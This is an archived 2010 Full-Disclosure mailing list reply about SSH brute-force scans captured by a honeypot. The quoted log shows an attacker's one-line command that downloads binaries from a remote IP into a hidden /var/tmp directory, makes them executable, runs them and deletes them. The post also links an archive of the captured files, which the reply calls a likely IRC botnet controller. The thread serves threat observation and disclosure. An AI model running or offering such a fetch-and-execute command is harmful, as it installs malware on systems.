[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] SSH scans, i caught one
- To: Marco van Berkum <marco@xxxxxxx>
- Subject: Re: [Full-disclosure] SSH scans, i caught one
- From: Danijel <theghost101@xxxxxxxxx>
- Date: Fri, 19 Nov 2010 11:13:18 +0100
Quick view at the files, it looks like a irc control for a botnet or
something similar
--
*blap*
On Thu, Nov 18, 2010 at 13:13, Marco van Berkum <marco@xxxxxxx> wrote:
> Hi,
>
> I got tired of all ssh scans the past few months so I've set up a Kojoney
> honeypot
> to see what the hell they were trying. This is what they try:
>
> 2010/11/17 21:22 CET [SSHChannel session (0) on SSHService ssh-connection
> on SSHServerTransport,27,84.51.138.193] executing command "cd /var/tmp;mkdir
> .scan;wgethttp://93.184.100.76:2700/pwn/syslgd;wget<https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/syslgd;wget>
>
> http://93.184.100.76:2700/pwn/ssh;chmod<https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/ssh;chmod>
> u+x syslgd ssh;./syslgd;rm syslgd"
>
> So I downloaded all his files from the /pwn/ directory. The funny part is,
> most of them are MIPS files(?).
> Also there are a lot of IRC config-like files.
>
> For anyone who's interested, this is what they try/download the moment they
> can login.
> http://safu.stream-portal.org/pwnd.tgz
>
> Have a nice day,
> Marco van Berkum
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/